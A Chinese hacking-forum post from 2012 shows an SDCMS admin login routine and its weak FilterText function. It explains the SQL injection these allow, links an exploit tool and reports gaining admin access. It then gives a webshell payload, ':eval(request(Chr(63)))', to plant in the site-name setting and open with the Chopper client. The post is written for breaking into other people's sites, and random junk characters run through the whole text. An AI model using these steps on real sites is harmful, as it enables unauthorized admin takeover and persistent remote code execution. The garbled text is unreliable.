作者:T00LS 鬼哥+ i, \& J! t6 I4 s# J( e
漏洞文件:后台目录/index.asp
8 G" q6 m/ }6 |' v3 f4 f0 m) {0 h* y
' ?- k4 ~+ f/ `, b2 JSub Check! c$ W! U( N( `
Dim username,password,code,getcode,Rs
3 v# M( J0 ~" x8 x% r- H6 R IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
8 C: x0 t7 V' r) \1 j username=FilterText(Trim(Request.Form("username")),1)3 S; ]6 L& l5 q" L+ S8 ^) I
password=FilterText(Trim(Request.Form("password")),1)
& W; Q; |! X9 v8 ^0 s- _; x code=Trim(Request.Form("yzm"))1 I3 l8 Y1 }" u7 X
getcode=Session("SDCMSCode")( A9 b; C- P4 I! n/ k D
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
8 s8 a% d+ S! [0 a9 s4 t- b& F IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
, A" I! I2 j! F; B+ l IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
' L( ^+ T# n* F. @& \ IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
" A* q6 J9 _5 ? IF username="" or password="" Then8 r& |& F. Z, ]' ?7 |2 ^ _3 } S, y
Echo "用户名或密码不能为空"ied" I& L0 Q2 F* v; ]0 c9 H6 ?
Else
! e1 i! z# P7 j- J$ s4 q( I Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
{; ?# n9 T! w- A* V; V IF Rs.Eof Then
( ~6 ]8 X0 X! x. q+ A AddLog username,GetIp,"登录失败",1# \- ^3 }" w4 }% t6 A" U* b+ r2 a
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"9 ^# C3 O$ T, n. u( J
Else9 `- v# e* F& t. \
Add_Cookies "sdcms_id",Rs(0)9 J; @& m8 W5 n# E) J+ X/ b
Add_Cookies "sdcms_name",username
; `* _' x; ~& g3 k1 h Add_Cookies "sdcms_pwd",Rs(2)! M1 B& l9 A6 o
Add_Cookies "sdcms_admin",Rs(3)+ v7 Q. D+ X# \7 ^* p5 K" N" K8 N
Add_Cookies "sdcms_alllever",Rs(4)7 o% |2 e* ~0 X h/ d: e" S
Add_Cookies "sdcms_infolever",Rs(5)
- q2 j) D2 h+ |) v5 J* A Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")) ?% _. D+ R" r9 b
AddLog username,GetIp,"登录成功",1
$ u/ [* y. ]+ r7 R6 M2 t$ U& c. ~ '自动删除30天前的Log记录
* g+ \+ G' U" B8 h6 h1 j+ s8 } IF Sdcms_DataType Then- O. }7 z" j3 t T
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
! M4 C0 O1 o0 ? Else
# K6 C. T |1 G7 y, c* s Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")4 D; B4 H1 y+ r
End IF; l! A" A0 q" c0 t3 o
Go("sdcms_index.asp")- W: W2 ?) Z2 T5 O7 G$ Z
End IF6 X: g7 A2 i) \. c4 H1 l1 U- [" `4 a$ q
Rs.Close! r* |1 V, E9 x7 J
Set Rs=Nothing9 u# q1 L3 x, `) c4 E7 z- Z9 c0 y7 Z
End IF3 p; [% d3 U$ ?0 U
End Sub
) N$ b* I4 ^# |0 Y$ s+ |4 H
3 r) `- r3 Z& L" C2 a. |+ R( W/ E’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码* B4 l, l9 A) Q# N
( q+ b( X4 d3 d" n( Z$ GFunction FilterText(ByVal t0,ByVal t1)
5 @7 r1 O5 _6 Z( V$ g5 w. |3 N n IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function" v6 Q) i% ~5 Z) o8 @
t0=Trim(t0)
) b1 z( Z. `4 ?# n; `# O+ ? Select Case t1
8 c+ y' b& N: |0 Z5 y; z1 [; I6 E Case "1"
" P: H+ v/ f) [ A& ?. T" B' w6 E t0=Replace(t0,Chr(32),"")- C2 {" C# Z& g$ D
t0=Replace(t0,Chr(13),"")
( y5 p/ b7 q+ N1 j. i t0=Replace(t0,Chr(10)&Chr(10),"")) b6 u! o5 w6 v6 F9 [+ h# p( c9 [
t0=Replace(t0,Chr(10),"")
- u v* c/ B$ X) h' r* z Case "2"* d" S4 g0 L; M+ u$ g I& n
t0=Replace(t0,Chr(8),"")'回格* q" X( y5 L; P' V+ b& P! ~
t0=Replace(t0,Chr(9),"")'tab(水平制表符)9 O9 P( p$ ^. _ G) s2 r
t0=Replace(t0,Chr(10),"")'换行
E. r- _$ F; x t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
& f( {+ d% N6 x* w3 p4 I% ~ t0=Replace(t0,Chr(12),"")'换页
n8 o2 M3 x: y i- t; u$ r t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合 h4 H) b" G4 G, d& q
t0=Replace(t0,Chr(22),"")
9 ~% O0 k6 K. ]7 ^3 @* j t0=Replace(t0,Chr(32),"")'空格 SPACE6 e1 e1 ?' @& D% S) s% S! F
t0=Replace(t0,Chr(33),"")'!! x% R; C; T& T+ x; D& e6 b& P
t0=Replace(t0,Chr(34),"")'"/ B* G0 G1 G% j: T# N7 L* U. M& a9 _9 B
t0=Replace(t0,Chr(35),"")'#2 N, n5 i. m5 Z5 s$ Q- s" u8 ]
t0=Replace(t0,Chr(36),"")'$
8 k$ _5 j3 [ d7 v$ o" m. U t0=Replace(t0,Chr(37),"")'%
, b5 v% v/ _2 t1 z t0=Replace(t0,Chr(38),"")'&3 [8 ^; q& Z# n' ]. }
t0=Replace(t0,Chr(39),"")''
+ S) Y: R" T4 J' I& D t0=Replace(t0,Chr(40),"")'(1 Y D: ^' h" j
t0=Replace(t0,Chr(41),"")'), ^( G4 h3 ?9 [) U4 i% R
t0=Replace(t0,Chr(42),"")'*, J& B. Y: o) b9 K
t0=Replace(t0,Chr(43),"")'+' u0 i) ?, h Y' p( m1 Q0 v4 y
t0=Replace(t0,Chr(44),"")',+ F& }! d" @% P2 b2 q" h1 j2 E
t0=Replace(t0,Chr(45),"")'-
! h/ |4 P+ z# d- u P t0=Replace(t0,Chr(46),"")'.- x, p! q; J% [( s
t0=Replace(t0,Chr(47),"")'/# U! i) R, i7 G( d
t0=Replace(t0,Chr(58),"")':
. l4 F1 `4 U" o0 O t0=Replace(t0,Chr(59),"")';
+ W5 r/ ]3 U4 n" N4 F t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
; k4 M% F' w% }+ N5 Q t0=Replace(t0,Chr(63),"")'?" l% t8 U! k: T
t0=Replace(t0,Chr(64),"")'@4 T6 t* |3 G1 W
t0=Replace(t0,Chr(91),"")'\
% F7 H; w/ h& a t0=Replace(t0,Chr(92),"")'\4 m/ j ?9 v; e; n6 _1 X
t0=Replace(t0,Chr(93),"")']' t, ^. L2 Q, Z5 U+ h! b7 f. q$ Y
t0=Replace(t0,Chr(94),"")'^3 e* @. f# k# T4 H
t0=Replace(t0,Chr(95),"")'_0 j8 j* R$ Q; n( t: v" {+ T
t0=Replace(t0,Chr(96),"")'`
6 v: h- B; H W' {2 T, y/ U3 w t0=Replace(t0,Chr(123),"")'{& ]5 h, j3 k$ ^- p! i5 K
t0=Replace(t0,Chr(124),"")'|
[! w1 p+ e- C1 N" V; q t0=Replace(t0,Chr(125),"")'}
5 H! E7 F+ B3 y5 H( Z t0=Replace(t0,Chr(126),"")'~
" O% \; T8 r# _/ e0 R# G# d Case Else$ U# Y" g6 M7 r( [/ O7 \6 B) H
t0=Replace(t0, "&", "&")
, e4 v3 U3 J+ D* t$ @+ v4 S t0=Replace(t0, "'", "'")( e: B5 p' U1 p0 |3 w4 M' U, }
t0=Replace(t0, """", """)5 |, r( w& j) S U Z" n
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
: [" u5 u' s* W9 L X) p( A1 Z End Select
. B3 a. |% k8 W3 ^0 P! j+ g IF Instr(Lcase(t0),"expression")>0 Then
# Z3 E# {: n0 A* U. s t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
% @1 A5 y1 l* j, K4 z" X! J0 z End If
. M H) g! u/ C' e0 m FilterText=t0
0 i! p% d) q$ [! EEnd Function0 P2 o& Y, c A) c0 J
8 [# J( [# b' B9 f
看到没。直接参数是1 只过滤3 V# G6 @! S( u' q! E) X3 a$ p- C$ f
t0=Replace(t0,Chr(32)," ")7 }# X2 T+ @) t* I$ Y0 R
t0=Replace(t0,Chr(13),"")
& V" N+ b! |+ q t0=Replace(t0,Chr(10)&Chr(10),"
& r5 H4 d) x0 Y! ?: P7 h")
6 w* y& _9 p. k9 \' H; O t0=Replace(t0,Chr(10),"
& c) A7 G) D) V# Q2 T")4 }. p- p6 f, S0 F
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!1 b o2 P) H% O
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
# T5 \$ ~) i" L. I5 D9 w
& r- H, O; z5 o) ?/ O! ^测试:
8 w7 {& r4 a6 _$ v* q0 S& g6 C( Y: i5 N- I X) [2 P
8 A( |) {7 e L6 B2 r现在输入工具上验证码,然后点OK5 |) z T- s e3 Z
' Y% g- l" u' ^% D& _1 o
, s; z6 T- d1 j5 Y
看到我们直接进入后台管理界面了,呵呵!
% G0 u7 y& [1 l- t- u: u {5 g% F
8 I. K# N$ I4 E2 A) p, z1 c- ?% {3 c5 q; O! }# [0 w9 R
7 M3 X5 y* c+ l
这样直接进入后台了。。。。
% I9 g+ j K( a6 X6 k- Z
6 Y( s' i% R0 k2 @" _ 1 F/ j' z2 f7 Y# h, ?
& j: R' u; m, A* {SDCMS提权:
" A$ T% R$ r9 R G$ O& ?* C* u( G7 @0 \# m7 E7 ~
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?) t& W: M% [% T- f5 b
- R. o4 L# h6 A4 q) B5 U
( g* t% D* {9 F& q3 `. r+ P$ r- O0 K/ }6 i7 }+ u
OK,现在用菜刀连接下!
F. b" w. g! h- p, V7 W: K- }8 u" Z' }! X$ v. O
+ ?* \. R* i+ N1 P E
3 ]; B: P5 a- W$ E. p
$ c4 n5 ] Q& L0 E* d, J- j
- Z- W4 o, T6 f |
发表于 2012-11-9 20:57:02
收藏
支持
反对